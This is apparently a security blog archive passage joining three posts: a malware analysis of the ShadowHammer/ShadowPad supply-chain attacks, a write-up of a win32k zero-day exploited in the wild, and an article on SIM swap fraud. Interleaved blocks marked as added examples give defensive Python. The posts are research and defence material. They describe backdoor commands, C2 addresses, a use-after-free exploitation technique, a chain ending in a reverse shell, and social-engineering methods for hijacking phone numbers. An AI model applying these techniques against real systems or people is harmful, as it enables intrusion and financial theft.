  • Microsoft Windows 2000e
  • Microsoft Windows XP
  • Microsoft Windows XP Professional x64 Edition
  • Microsoft Windows Server 2003
  • Microsoft Windows Server 2003 R2
  • Microsoft Windows Vista
  • Microsoft Windows Server 2008
  • Microsoft Windows 7
  • Microsoft Windows Server 2008 R2
  • Microsoft Windows 8
  • Microsoft Windows Server 2012
  • Microsoft Windows 8.1
  • Microsoft Windows Server 2012 R2
  • Microsoft Windows 10
  • Microsoft Windows Server 2016

The purpose of the code is to submit system information to the C2 server with a POST request and then send another GET request to receive a command to execute.

The following commands were discovered:

  • DownUrlFile – download URL data to file
  • DownRunUrlFile – download URL data to file and execute it
  • RunUrlBinInMem – download URL data and run as shellcode
  • UnInstall – set registry flag to prevent malware start

The UnInstall command sets the registry value HKCU\SOFTWARE\Microsoft\Windows\{0753-6681-BD59-8819} to 1, which prevents the malware from contacting the C2 again. No files are deleted from the disk, and the files should be discoverable through forensic analysis.

Similarities between the ASUS attack and the non-ASUS-related cases

Although the ASUS case and the videogame industry cases contain certain differences, they are very similar. Let us briefly mention some of the similarities. For instance, the algorithm used to calculate API function hashes (in trojanized games) resembles the one used in the backdoored ASUS Updater tool.

ASUS case:

    hash = 0
    for c in string:
        hash = hash * 0x21
        hash = hash + c
    return hash

Other cases:

    hash = 0
    for c in string:
        hash = hash * 0x83
        hash = hash + c
    return hash & 0x7FFFFFFF

Pseudocode of API hashing algorithm of ASUS vs. other cases

Besides that, our behavior engine identified that the ASUS and other related samples are among the very few cases where IPHLPAPI.dll was used from within a shellcode embedded into a PE file.

In the case of ASUS, the function GetAdaptersAddresses from the IPHLPAPI.dll was used for calculating the hashes of MAC addresses. In the other cases, the function GetAdaptersInfo from the IPHLPAPI.dll was used to retrieve information about the MAC addresses of the computer to pass to remote C&C servers.
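
As an added example (not code from the original write-up), here are both hashing routines from the pseudocode above in Python, together with a small resolver that maps hash values recovered from a sample back to export names such as GetAdaptersInfo and GetAdaptersAddresses. The 32-bit truncation and the list of candidate export names are assumptions made for this example.

```python
# Added example: both API-hashing routines from the pseudocode above, plus a resolver
# that maps hash values recovered from a sample back to export names. The 32-bit
# truncation is an assumption (the pseudocode omits it; the real code runs in 32-bit
# registers, and truncating inside the loop does not change the low 32 bits).

MASK32 = 0xFFFFFFFF


def hash_asus(name: str) -> int:
    """ASUS ShadowHammer variant: h = h * 0x21 + c over each byte of the name."""
    h = 0
    for c in name.encode("ascii"):
        h = (h * 0x21 + c) & MASK32
    return h


def hash_other(name: str) -> int:
    """Videogame-vendor variant: h = h * 0x83 + c, result masked to 31 bits."""
    h = 0
    for c in name.encode("ascii"):
        h = (h * 0x83 + c) & MASK32
    return h & 0x7FFFFFFF


# Candidate export names for the lookup; constructed for this example. In practice,
# feed it the export tables of the DLLs the sample resolves (IPHLPAPI.dll, kernel32, ...).
CANDIDATE_EXPORTS = (
    "GetAdaptersAddresses", "GetAdaptersInfo", "LoadLibraryA", "GetProcAddress",
    "VirtualAlloc", "VirtualProtect", "CreateThread", "WinHttpOpen", "InternetOpenA",
)

VARIANTS = (("asus", hash_asus), ("other", hash_other))


def build_tables(names=CANDIDATE_EXPORTS) -> dict:
    """Precompute {variant: {hash: export_name}} so many hashes can be resolved quickly."""
    return {variant: {fn(n): n for n in names} for variant, fn in VARIANTS}


def resolve(value: int, tables=None):
    """Return (variant, export_name) for a hash seen in a sample, or None if unknown."""
    tables = tables or build_tables()
    for variant, _ in VARIANTS:
        name = tables[variant].get(value)
        if name is not None:
            return variant, name
    return None


if __name__ == "__main__":
    tables = build_tables()
    for variant, fn in VARIANTS:
        print(variant, hex(fn("GetAdaptersInfo")), resolve(fn("GetAdaptersInfo"), tables))
```

Because both routines share the same multiply-and-add shape and differ only in the multiplier and the final mask, a resolver that tries both variants is a cheap way to spot which family a new sample belongs to.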

ShadowPad connection

While investigating this case, we worked with several companies that had been abused in this wave of supply chain attacks. Our joint investigation revealed that the attackers deployed several tools on an attacked network, including a trojanized linker and a powerful backdoor packed with a recent version of VMProtect.

Our analysis of the sophisticated backdoor (md5: 37e100dd8b2ad8b301b130c2bca3f1ea) that was deployed by the attackers on the company’s internal network during the breach revealed that it was an updated version of the ShadowPad backdoor, which we reported on in 2017.

The ShadowPad backdoor used in these cases has a very high level of complexity, which makes it almost impossible to reverse engineer:

The newly updated version of ShadowPad follows the same principle as before. The backdoor unwraps multiple stages of code before activating a system of plugins responsible for bootstrapping the main malicious functionality. As with ShadowPad, the attackers used at least two stages of C2 servers, where the first stage would provide the backdoor with an encrypted next-stage C2 domain.

The backdoor contains a hardcoded URL for C2 communication, which points to a publicly editable online Google document. Such online documents, which we extracted from several backdoors, were created by the same user under the name Tom Giardino (hrsimon59@gmail[.]com), probably a reference to the spokesperson from Valve Corporation.

These online documents contained an ASCII block of text marked as an RSA private key during the time of operation. We noticed that inside the private key, normally encoded with base64, there was an invalid character injection (the symbol “$”):

The message between the two “$” characters in fact contained an encrypted second-stage C2 URL.

We managed to extract the history of changes and collected the following information indicating the time and C2 of ongoing operations in 2018:

  • Jul 31: UDP://103.19.3[.]17:443
  • Aug 13: UDP://103.19.3[.]17:443
  • Oct 08: UDP://103.19.3[.]17:443
  • Oct 09: UDP://103.19.3[.]17:443
  • Oct 22: UDP://117.16.142[.]9:443
  • Nov 20: HTTPS://23.236.77[.]177:443
  • Nov 21: UDP://117.16.142[.]9:443
  • Nov 22: UDP://117.16.142[.]9:443
  • Nov 23: UDP://117.16.142[.]9:443
  • Nov 27: UDP://117.16.142[.]9:443
  • Nov 27: HTTPS://103.19.3[.]44:443
  • Nov 27: TCP://103.19.3[.]44:443
  • Nov 27: UDP://103.19.3[.]44:1194
  • Nov 27: HTTPS://23.236.77[.]175:443
  • Nov 29: HTTPS://23.236.77[.]175:443
  • Nov 29: UDP://103.19.3[.]43:443
  • Nov 30: HTTPS://23.236.77[.]177:443

The IP address range belongs to the Chinese hosting company Aoyouhost LLC, incorporated in Los Angeles, CA.

Another IP address (117.16.142[.]9) belongs to a range listed as the Korean Education Network and likely belongs to Konkuk university (konkuk.ac.kr). This IP address range has been previously reported by Avast as one of those related to the ShadowPad activity linked to the CCleaner incident. It seems that the ShadowPad attackers are still abusing the university’s network to host their C2 infrastructure.

The last one, 103.19.3[.]44, is located in Japan but seems to belong to another Chinese ISP known as “xTom Shanghai Limited”. When connected to via the IP address, the server displays an error page from Chinese web management software called BaoTa (“宝塔” in Chinese):

PlugX connection

While analyzing the malicious payload injected into the signed ASUS Live Updater binaries, we came across a simple custom encryption algorithm used in the malware. We found that ShadowHammer reused algorithms used in multiple malware samples, including many of PlugX. PlugX is a backdoor quite popular among Chinese-speaking hacker groups. It had previously been seen in the Codoso, MenuPass and Hikit attacks. Some of the samples we found (e.g. md5:5d40e86b09e6fe1dedbc87457a086d95) were created as early as 2012, if the compilation timestamp is anything to trust.

Apparently, both pieces of code not only share the same constants (0x11111111, 0x22222222, 0x33333333, 0x44444444) but also implement identical algorithms to decrypt data, summarized in the Python function below.

    from ctypes import c_uint32
    from struct import unpack

    def decrypt(data: bytes) -> bytes:
        # The first dword of the buffer seeds all four 32-bit state variables
        p1 = p2 = p3 = p4 = unpack("<L", data[0:4])[0]
        decdata = bytearray()
        for b in data:
            # Advance the state using the constants shared with PlugX
            p1 = c_uint32(p1 + (p1 >> 3) - 0x11111111).value
            p2 = c_uint32(p2 + (p2 >> 5) - 0x22222222).value
            p3 = c_uint32(p3 - (p3 << 7) + 0x33333333).value
            p4 = c_uint32(p4 - (p4 << 9) + 0x44444444).value
            # Each byte is XORed with the low byte of the sum of the four low bytes
            decdata.append(b ^ ((p1 % 256 + p2 % 256 + p3 % 256 + p4 % 256) % 256))
        return bytes(decdata)

While this does not indicate a strong connection to PlugX creators, the reuse of the algorithm is unusual and may suggest that the ShadowHammer developers had some experience with PlugX source code, and possibly compiled and used PlugX in some other attacks in the past.

Compromising software developers

All of the analyzed ASUS Live Updater binaries were backdoored using the same executable file patched by an external malicious application, which implemented malware injection on demand. After that, the attackers signed the executable and delivered it to the victims via ASUS update servers, which was detected by Kaspersky Lab products.

However, in the non-ASUS cases, the malware was seamlessly integrated into the code of recently compiled legitimate applications, which suggests that a different technique was used. Our deep search revealed another malware injection mechanism, which comes from a trojanized development environment used by software coders in the organization.

In late 2018, we found a suspicious sample of the link.exe tool uploaded to a public malware scanning service. The tool is part of Microsoft Visual Studio, a popular integrated development environment (IDE) used for creating applications for Microsoft Windows. The same user also uploaded digitally signed compromised executables and some of the backdoors used in the same campaign.

The attack consists of an infected Microsoft Incremental Linker and a malicious DLL module that gets loaded through the compromised linker. The malicious DLL then hooks the file open operation and redirects attempts to open a commonly used C++ runtime library during the process of static linking. The redirect destination is a malicious .lib file, which gets linked with the target software instead of the legitimate library. The code also carefully checks which executable is being linked and applies the file redirection only if the name matches the hardcoded target file name.

So, was it a developer from a videogame company that installed the trojanized version of the development software, or did the attackers deploy the Trojan code after compromising the developer’s machine? This currently remains unknown. While we could not identify how the attackers managed to replace key files in the integrated development environment, this should serve as a wakeup call to all software developers. If your company produces software, you should ask yourself:

  1. Where does my development software come from?
  2. Is the delivery process (download) of IDE distributions secure?
  3. When did we last check the integrity of our development software?
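
One way to answer the third question above, as an added example that is not code from the original post: pin the SHA-256 of every .exe, .dll and .lib under the toolchain directory while it is known-good, and diff the directory against that manifest before each build. The directory layout and file contents in demo() are constructed placeholders, not real toolchain files.

```python
import hashlib
import shutil
import tempfile
from pathlib import Path

# File types worth pinning in a build toolchain: the linker and compiler binaries,
# every DLL they can load, and the static libraries they link in.
PINNED_PATTERNS = ("*.exe", "*.dll", "*.lib")


def sha256_file(path: Path) -> str:
    """Stream a file through SHA-256 so large toolchain binaries need not fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(tool_dir: Path, patterns=PINNED_PATTERNS) -> dict:
    """Record {relative_path: sha256} for every pinned file under the toolchain directory.

    Run this once against a freshly installed, trusted toolchain and store the result
    outside the build host (for example in version control next to the build definition)."""
    return {
        p.relative_to(tool_dir).as_posix(): sha256_file(p)
        for pat in patterns
        for p in sorted(tool_dir.rglob(pat))
        if p.is_file()
    }


def verify_toolchain(tool_dir: Path, manifest: dict) -> dict:
    """Compare the toolchain on disk with a trusted manifest.

    'modified' catches a patched link.exe; 'added' catches a DLL or .lib that appeared
    next to the linker; 'missing' catches removed files. All three empty means pass."""
    current = build_manifest(tool_dir)
    return {
        "modified": sorted(n for n in manifest if n in current and current[n] != manifest[n]),
        "added": sorted(n for n in current if n not in manifest),
        "missing": sorted(n for n in manifest if n not in current),
    }


def demo() -> dict:
    """Build a throwaway toolchain directory with constructed files, pin it, then tamper with it."""
    tool_dir = Path(tempfile.mkdtemp(prefix="toolchain-"))
    try:
        bin_dir = tool_dir / "VC" / "bin"
        bin_dir.mkdir(parents=True)
        (bin_dir / "link.exe").write_bytes(b"MZ constructed linker")
        (bin_dir / "cl.exe").write_bytes(b"MZ constructed compiler")
        manifest = build_manifest(tool_dir)
        # Reproduce the pattern from the write-up: the linker is patched and a new
        # DLL appears beside it. Contents are placeholders, not real binaries.
        (bin_dir / "link.exe").write_bytes(b"MZ constructed linker with extra code")
        (bin_dir / "helper.dll").write_bytes(b"MZ constructed dll")
        return verify_toolchain(tool_dir, manifest)
    finally:
        shutil.rmtree(tool_dir, ignore_errors=True)


if __name__ == "__main__":
    print(demo())
```

The manifest only helps if it was taken from a trusted install and is kept where a compromised build host cannot rewrite it; pinning the hashes of the installer itself before the toolchain is ever unpacked closes the same gap for the second question.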

Other victims

During the analysis of samples related to the updated ShadowPad arsenal, we discovered one unusual backdoor executable (md5: 092ae9ce61f6575344c424967bd79437). It comes as a DLL installed as a service that indirectly listens to TCP port 80 on the target system and responds to a specific URL schema, registered with Windows HTTP Service API: http://+/requested.html. The malware responds to HTTP GET/POST requests using this schema and is not easy to discover, which can help it remain invisible for a long time.

Based on the malware network behavior, we identified three further, previously unknown, victims, a videogame company, a conglomerate holding company and a pharmaceutical company, all based in South Korea, which responded with a confirmation to the malware protocol, indicating compromised servers. We are in the process of notifying the victim companies via our local regional channels. Considering that this type of malware is not widely used and is a custom one, we believe that the same threat actor or a related group are behind these further compromises. This expands the list of previously known usual targets.


While attacks on supply chain companies are not new, the current incident is a big landmark in the cyberattack landscape. Not only does it show that even reputable vendors may suffer from the compromise of digital certificates, but it also raises many concerns about the software development infrastructure of all other software companies. ShadowPad, a powerful threat actor, previously concentrated on hitting one company at a time. Current research revealed at least four companies compromised in a similar manner, with three more suspected to have been breached by the same attacker. How many more companies are compromised out there is not known. What is known is that ShadowPad succeeded in backdooring developer tools and, one way or another, injected malicious code into digitally signed binaries, subverting trust in this powerful defense mechanism.

Does it mean that we should stop trusting digital signatures? No. But we definitely need to investigate all strange or anomalous behavior, even by trusted and signed applications. Software vendors should introduce another line in their software building conveyor that additionally checks their software for potential malware injections even after the code is digitally signed.

At this unprecedented scale of operations, it is still a mystery why the attackers reduced the impact by limiting payload execution to 600+ victims in the case of ASUS. We are also unsure who the ultimate victims were or where the attackers had collected the victims’ MAC addresses from. If you believe you are one of the victims, we recommend checking your MAC address using this free tool or online check website. And if you discover that you have been targeted by this operation, please email us at shadowhammer@kaspersky.com.

We will keep tracking the ShadowPad activities and inform you about new findings!

Indicators of compromise

C2 servers:

  • 103.19.3[.]17
  • 103.19.3[.]43
  • 103.19.3[.]44
  • 117.16.142[.]9
  • 23.236.77[.]175
  • 23.236.77[.]177

Malware samples and trojanized files:

15 April 2019

New zero-day vulnerability CVE-2019-0859 in win32k.sys

In March 2019, our automatic Exploit Prevention (EP) systems detected an attempt to exploit a vulnerability in the Microsoft Windows operating system. Further analysis of this event led to us discovering a zero-day vulnerability in win32k.sys. It was the fifth consecutive exploited Local Privilege Escalation vulnerability in Windows that we have discovered in recent months using our technologies. The previous ones were:

On March 17, 2019, we reported our discovery to Microsoft; the company confirmed the vulnerability and assigned it CVE-2019-0859. Microsoft has just released a patch as part of its update, crediting Kaspersky Lab researchers Vasiliy Berdnikov and Boris Larin.

Technical details

CVE-2019-0859 is a Use-After-Free vulnerability that is present in the CreateWindowEx function. During execution, CreateWindowEx sends the message WM_NCCREATE to the window when it is first created. By using the SetWindowsHookEx function, it is possible to set a custom callback that can handle the WM_NCCREATE message right before the window procedure is called.

In win32k.sys all windows are represented by the tagWND structure, which has an “fnid” field also known as the Function ID. The field is used to define the class of a window; all windows are divided into classes such as ScrollBar, Menu, Desktop and many others. We have already written about Function ID related bugs.

During the WM_NCCREATE callback, the Function ID of a window is set to 0, which allowed us to set extra data for the window from inside our hook. More importantly, we were able to change the address of the window procedure that is executed immediately after our hook. Changing the window procedure to the menu window procedure leads to the execution of xxxMenuWindowProc, and that function sets the Function ID to FNID_MENU because the current message is WM_NCCREATE. But the most important part is that manipulating the extra data before the Function ID is set to FNID_MENU can force xxxMenuWindowProc to stop initialization of the menu and return FALSE. As a result, the sending of the WM_NCCREATE message is treated as a failed operation and the CreateWindowEx function stops execution with a call to FreeWindow. Because our MENU-class window was never actually initialized, this gives us control over the address of the memory block that is freed.

win32k!xxxFreeWindow+0x1344 on up-to-date Windows 7 SP1 x64

The exploit we found in the wild was targeting 64-bit versions of Windows (from Windows 7 to older builds of Windows 10) and exploited the vulnerability using the well-known HMValidateHandle technique to bypass ASLR.

After a successful exploitation, the exploit executed PowerShell with a Base64-encoded command. The main aim of this command was to download a second-stage script from https://pastebin.com. The second-stage PowerShell script executes the final, third stage, which is also a PowerShell script.

Third stage PowerShell script

The third script is very simple and does the following:

  • Unpacks shellcode
  • Allocates executable memory
  • Copies shellcode to allocated memory
  • Calls CreateThread to execute shellcode

Shellcode from PowerShell script

The main goal of the shellcode is to make a trivial HTTP reverse shell. This helps the attacker gain full control over the victim’s system.

Kaspersky Lab products detected this exploit proactively through the following technologies:

  1. Behavioral detection engine and Exploit Prevention for endpoint products;
  2. Advanced Sandboxing and Anti-Malware engine of the Kaspersky Anti Targeted Attack (KATA) platform.

Kaspersky Lab verdicts for the artifacts used in this and related attacks are:

  • HEUR:Exploit.Win32.Generic
  • HEUR:Trojan.Win32.Generic
  • PDM:Exploit.Win32.Generic
11 April 2019

Large-scale SIM swap fraud


SIM swap fraud is a type of account takeover fraud that generally targets a weakness in two-factor authentication and two-step verification, where the second factor or step is an SMS or a call placed to a mobile telephone. The fraud centers around exploiting a mobile phone operator’s ability to seamlessly port a telephone number to a new SIM. This feature is normally used when a customer has lost or had their phone stolen. Attacks like these are now widespread, with cybercriminals using them not only to steal credentials and capture OTPs (one-time passwords) sent via SMS but also to cause financial damage to victims.

If someone steals your phone number, you’ll face a lot of problems, especially because most of our modern two-factor authentication systems are based on SMSs that can be intercepted using this technique. Criminals can hijack your accounts one by one by having a password reset sent to your phone. They can trick automated systems – like your bank – into thinking they’re you when they call customer service. And worse, they can use your hijacked number to break into your work email and documents. And these attacks are possible because our financial life revolves around mobile apps that we use to send money, pay bills, etc.

Mobile payments are now huge in developing countries, especially in Africa and Latin America. Mobile phone-based money transfers allow users to access financing and micro-financing services, and to easily deposit, withdraw and pay for goods and services with a mobile device. In some cases, almost half the value of some African countries’ GDP goes through mobile phones. But nowadays these mobile payments are suffering a wave of attacks and people are losing their money – all powered by SIM swap fraud conducted on a major scale.

Like many other countries, Brazil and Mozambique had a high rate of SIM swap fraud. Both countries speak the same language (Portuguese) and were facing the same problem. By using social engineering, bribery, or even a simple phishing attack, fraudsters take control of customers’ phone numbers in order to receive mobile money transactions, or to collect the home banking OTPs to complete a transfer of funds or steal users’ money. In Mozambique this sort of crime was all over the national news, with the media questioning the integrity of the banks and mobile operators, suggesting they may be colluding in the scams. The reputation of the banks and operators was at stake; something urgent needed to be done to protect their customers.

In Brazil the problem was affecting not only average citizens but also politicians, ministers, governors and high-profile businessmen. Online banking customers were also experiencing losses from their accounts. One organized gang alone in Brazil was able to SIM swap 5,000 victims. At Mozambique’s largest bank they had a monthly average of 17.2 cases of SIM swap fraud; the true impact nationwide is difficult to estimate as most banks don’t publicly share statistics. As was the case in Brazil, some of the victims were high-profile businessmen who had up to US$50,000 stolen from their bank accounts.

In Mozambique a nationwide push saw the operators and the banks sit down together and come up with a solution that drastically decreased the level of fraud. This new solution was designed locally, was surprisingly simple, but at the same time very effective; after the biggest and most popular bank in the country adopted it, there was an immediate reduction in the number of frauds. The Central Bank of Mozambique saw the potential of the platform and is considering making it mandatory for all banks.

In this article we’ll detail how very organized cybercrime developed their own ecosystem of fraud and how Mozambique was able to solve the problem of money being stolen in SIM swap fraud schemes, where mobile payments are an essential part of everyday life.

How the cybercriminals do it

The scam begins with a fraudster gathering details about the victim by using phishing emails, by buying information from organized crime groups, via social engineering or by obtaining the information following data leaks. Once the fraudster has obtained the necessary details they will then contact the victim’s mobile telephone provider. The fraudster uses social engineering techniques to convince the telephone company to port the victim’s phone number to the fraudster’s SIM, for example, by impersonating the victim and claiming they have lost their phone. They then ask for the number to be activated on a new SIM card.

After that the victim’s phone loses its connection to the network and the fraudster receives all the SMSs and voice calls intended for the victim. This allows the fraudster to intercept any one-time passwords sent via SMS or telephone calls made to the victim; all the services that rely on an SMS or telephone call authentication can then be used.

We have found that some of the processes used by mobile operators are weak and leave customers open to SIM swap attacks. For example, in some markets in order to validate your identity the operator may ask for some basic information such as full name, date of birth, the amount of the last top-up voucher, the last five numbers called, etc. Fraudsters can find some of this information on social media or by using apps such as TrueCaller to get the caller name based on the number. With a bit of social engineering they also try to guess the voucher amount based on what’s more popular in the local market. And what about the last five calls? One technique used by the fraudsters is to plant a few ‘missed calls’ or to send an SMS to the victim’s number as bait so that they call back.

Sometimes the target is the carrier, and not the customer. This happens when employees in a carrier’s branches in small cities, especially branches located in kiosks or shopping malls, are unable to identify a fraudulent or altered document, allowing a fraudster to activate a new SIM card. Another big problem is insiders, with some cybercriminals recruiting corrupt employees, paying them $10 to $15 per SIM card activated. The worst attacks occur when a fraudster sends a phishing email that aims to steal a carrier’s system credentials. Ironically, most of these systems don’t use two-factor authentication. Sometimes the goal of such emails is to install malware on the carrier’s network – all a fraudster needs is just one credential, even from a small branch in a small city, to give them access to the carrier’s system.

How much does a SIM swap of your number cost? It depends on how easy or hard it is to do. It’s easier with some carriers than others. A SIM swap for a famous celebrity or a politician can cost thousands of dollars. These are the prices stated on Brazilian underground forums, or occasionally on closed Facebook communities:

  • Carrier A: $10
  • Carrier B: $15
  • Carrier C: $20
  • Carrier D: $25
  • Carrier E: $40

The interest in such attacks is so great among cybercriminals that some of them decided to sell it as a service to others. Normally, a criminal can conduct an attack in two or three hours without much effort, because they already have access to the carrier’s system or an insider.

A Portuguese-speaking cybercriminal selling a SIM swap service. They call it ‘recover chip’…

Brazil has a very organized cybercrime scene, and it’s only natural that its actors will export their techniques and tactics to their fellow cybercriminals acting in other countries, especially in other Portuguese-speaking countries (Portugal, Mozambique, and Angola).

Falling victim – me too

The fraudsters fire in all directions; sometimes their attacks are targeted, sometimes they’re not. All a fraudster needs is your number, and it’s very easy to find it by searching through leaked databases, buying that database from data brokers (some of them are legal), or using apps like TrueCaller and other similar apps that offer caller ID and spam blocking, but which also have some privacy issues and a name-based search for subscribers. Sometimes your number can be found by simply doing a Google search.

The first sign that something is not quite right is when you lose your smartphone signal somewhere that normally has a strong signal. In a hotel last year while on a business trip my corporate smartphone suddenly lost its mobile connection, with no data or calls for about 30 minutes. I tried to solve the problem by connecting to any available network (I was using roaming so it wasn’t a problem), but all of them rejected my device:

As a final resort, I tried rebooting the device and connecting it again, with no success. After that I decided to call (using VoIP) the carrier I’m a customer of to find out what was going on. The operator told me someone had reported my number as “lost or stolen” and asked to activate it on another SIM card. This came as no surprise at all, because the number of victims in Brazil reporting the same problem is growing considerably. What was most surprising was the ease with which the employee gave me this information, as though it was nothing critical, suggesting it was a common occurrence for them. I immediately informed the operator about the ownership of the number, confirmed some personal information and the problem was quickly resolved.

Anyone can be a victim.

Brazil: extortion, WhatsApp and fintechs

WhatsApp is the most popular instant messenger in a number of countries where the app is used by Brazilian fraudsters to steal money in an attack known as ‘WhatsApp cloning’. After a SIM swap, the first thing the criminal does is to load WhatsApp and all the victim’s chats and contacts. Then they begin messaging the contacts in the victim’s name, citing an emergency and asking for money. In some cases, they feign a kidnapping situation, asking for an urgent payment – and some of the contacts will send money.

Brazilian TV has reported on several such cases, with one family losing US$3,000. Some of the attacks targeted companies, with executives supposedly contacting their financial departments asking for funds, when in fact it was fraudsters using WhatsApp accounts hijacked in a SIM swap. It’s like a BEC (Business E-mail Compromise) but using your WhatsApp account.

Extortion attacks via WhatsApp start with a SIM swap

The fintech boom in Brazil started with companies offering credit cards and bank accounts with no fees, especially after the successful launch of Nubank in 2013. Since then, similar solutions have emerged, such as Banco Inter, Next, Digio and Neon, most of them tied to a digital account. Most of them still rely on two-factor authentication via SMS. The ease with which a SIM swap can be performed helped fraudsters find new ways of emptying users’ banking accounts. That’s what happened to the customers of popular Brazilian fintech meupag!, according to a report by Gizmodo Brasil.

The fraudsters performed a SIM swap, activating the victim’s number on another SIM card. Then, on a smartphone with the pag! app installed, the fraudsters used the app’s password recovery function and a code was sent via SMS, allowing the bad guys to gain total control of the user’s account in the app. Once this access is obtained the fraudsters performed several illegal payments with the credit card issued in the app in the name of the victim. Some victims reported losses of US$3,300 in fraudulent transactions.

Mozambique: bribery, banks and a solution

Mobile payments are huge in African countries. Traditional banks are not accessible in rural areas where poor farmers would literally have to walk hundreds of kilometers to reach the closest branch. Mobile operators saw this gap and took the opportunity to invest and diversify their business into micro-finance services and reach areas where there is mobile coverage – all that’s required is a basic mobile phone.

Mobile payment systems like M-Pesa have made a huge impact in Africa. In Mozambique approximately US$5 billion per year is transacted through this platform which corresponds to approximately 41% of the country’s GDP, and in more mature and populated markets like Kenya it goes up to US$33 billion or 48% of the total GDP volume.

Most local banks rely on a one-time password (OTP), with many preferring not to use physical or software tokens as this increases the cost and complexity for customers, especially those on low incomes. The banks therefore try to keep it simple, using an SMS as the second factor. This shows that, perhaps without them even realizing it, they share the responsibility of securing their customers’ bank accounts with the mobile operators.

Mobile fraud on the rise

With financial inclusion services prospering in Africa, the flip side is that it opens a world of opportunities to fraudsters. The population’s technological literacy is very low, especially those on lower incomes. Remarkably, many of the fraudsters are prisoners who somehow have access to mobile phones and a lot of spare time on their hands.

Most SIM swap frauds operate in the same way. There are syndicates that identify and collude with employees from the banks and mobile operators. The bank employee is responsible for providing information about an account balance and detailed information about the victim. Armed with this information, the fraudsters conduct a phishing or SMiShing attack to gain access to the victim’s online banking account and its verification codes.

In the second part of the attack, since the banks use SMS for their OTPs, the criminals need to conduct a SIM swap or SIM card hijacking to redirect all the victim’s communications to a new SIM card that’s in their possession. To achieve this, these syndicates rely on some cooperation from mobile operator employees, though the latter can be easily tracked down and detained. This is why the criminals mostly make use of forged documents that are required by the operator for the SIM swap and present them at mobile retail stores as part of a fraudulent request for a new SIM card. The staff at these stores often don’t have sufficient training to detect forged documents, and even if they do, sometimes the documents are authenticated by an official notary who has been bribed.

Since a phone number can only work on one SIM card at a time, the victim’s original SIM card is immediately blocked and, voilà, the fraudster now has control of the victim’s mobile communications.

The solution adopted in Mozambique

A nationwide push saw the operators and the banks sit down together and come up with a solution that drastically decreased the level of fraud. The new solution was designed locally, was surprisingly simple, but at the same time very effective; after the biggest and most popular bank in the country adopted it, there was a drastic reduction in the number of frauds. The Central Bank of Mozambique saw the potential of the platform and now wants to make it mandatory for all banks.

When a SIM card is hijacked there’s a good chance the fraudster will attempt to transfer funds from the bank account within minutes of the SIM swap to prevent the original owner from having enough time to complain to the mobile operator and regain control of the number.

After a subscriber’s number is blocked following a SIM swap, the victim usually thinks there’s a network problem and only when they realize that other people nearby still have a network connection do they decide to contact the call center from another phone or physically go to a retail shop to find out what is going on. There have been cases like Fabio’s above in which the fraudsters know the victim and wait until the target travels to another country so that it’s even harder for the person to go to a retail store and regain control of the mobile number. If the user has not turned on roaming, they typically only regain control of their numbers within one or two days.

How the solution works

All mobile operators in Mozambique made a platform available to the banks on a private API that flags up if there was a SIM swap involving a specific mobile number associated with a bank account over a predefined period. The bank then decides what to do next.

Most banks block any transaction from a mobile number that has undergone a SIM card change within the last 48 hours, while others opt for the longer period of 72 hours. This period of 48-72 hours is considered a safe period during which the subscriber will contact their operator if they have fallen victim to an unauthorized SIM card change.

There’s also the possibility that the mobile owner has legitimately changed their SIM card and is therefore unable to perform an online transaction for the next 48 hours. In such cases, some of the banks we spoke to have a process that requires face-to-face verification in a branch office – a reasonable compromise in the circumstances.

Platform workflow
  1. The banks are connected to different mobile operators through a VPN connection so that all traffic is secure.
  2. The online banking system conducts a REST API query to the respective mobile operator giving the mobile number (MSISDN) and the period (24-72 hours) as arguments.
  3. The mobile operator simply returns in real time: True or False.
  4. If the query is False, the bank allows the transaction as normal. If True, the bank blocks the transaction and may request additional steps to verify the transaction.

It is important to reiterate that the mobile operator does not share personal identifiable information (PII) with a third party, in this case banks. The national regulator for communications deemed the sharing of non-identifiable information by operators with the banks to be a case of national interest.
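The four workflow steps above, modelled in Python as an added example; this is not code from the article, nor from any operator or bank in Mozambique. The operator side keeps nothing but SIM-change timestamps per MSISDN and answers the bank's query with a bare True/False for a 24-72 hour period, so no PII crosses the API; the bank side applies its own 48- or 72-hour window. Class and function names, the MSISDNs and the scenario timestamps are all constructed for the illustration.

```python
from dataclasses import dataclass, field
from datetime import datetime, timedelta
from typing import Dict, List


@dataclass
class OperatorSimRegistry:
    """Operator side (constructed model). Holds only SIM-change timestamps
    per MSISDN; that single fact is all the private API exposes to a bank."""
    sim_changes: Dict[str, List[datetime]] = field(default_factory=dict)

    def record_sim_change(self, msisdn: str, when: datetime) -> None:
        self.sim_changes.setdefault(msisdn, []).append(when)

    def sim_changed_within(self, msisdn: str, period_hours: int, now: datetime) -> bool:
        """Answer to the REST query described in step 2/3: True if any SIM
        change for this MSISDN falls inside the last `period_hours` hours,
        otherwise False. No subscriber details leave the operator."""
        if not 24 <= period_hours <= 72:
            raise ValueError("period must be between 24 and 72 hours")
        cutoff = now - timedelta(hours=period_hours)
        return any(t >= cutoff for t in self.sim_changes.get(msisdn, []))


@dataclass
class Bank:
    """Bank side (constructed model). Blocks a transaction from a number whose
    SIM changed inside the configured window: 48 h for most banks, 72 h for some."""
    registry: OperatorSimRegistry
    window_hours: int = 48

    def authorize_transaction(self, msisdn: str, now: datetime) -> str:
        # Step 4: True -> block and escalate; False -> allow as normal.
        if self.registry.sim_changed_within(msisdn, self.window_hours, now):
            # Legitimate SIM replacements land here as well; the fallback the
            # article describes is face-to-face verification in a branch.
            return "BLOCK_VERIFY_IN_BRANCH"
        return "ALLOW"


def demo() -> Dict[str, str]:
    """Constructed scenario: one number swapped 2 hours ago, one swapped
    60 hours ago, one never swapped, checked by a 48 h and a 72 h bank."""
    now = datetime(2019, 5, 15, 12, 0)
    reg = OperatorSimRegistry()
    reg.record_sim_change("258840000001", now - timedelta(hours=2))
    reg.record_sim_change("258840000002", now - timedelta(hours=60))
    bank48 = Bank(reg, window_hours=48)
    bank72 = Bank(reg, window_hours=72)
    return {
        "swapped_2h_48h_bank": bank48.authorize_transaction("258840000001", now),
        "swapped_60h_48h_bank": bank48.authorize_transaction("258840000002", now),
        "swapped_60h_72h_bank": bank72.authorize_transaction("258840000002", now),
        "never_swapped_48h_bank": bank48.authorize_transaction("258840000003", now),
    }


if __name__ == "__main__":
    for case, decision in demo().items():
        print(f"{case}: {decision}")
```

The 60-hour case shows why the window length is a policy choice: a 48-hour bank lets that transaction through while a 72-hour bank holds it for verification, at the cost of inconveniencing more subscribers who replaced a SIM for legitimate reasons.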

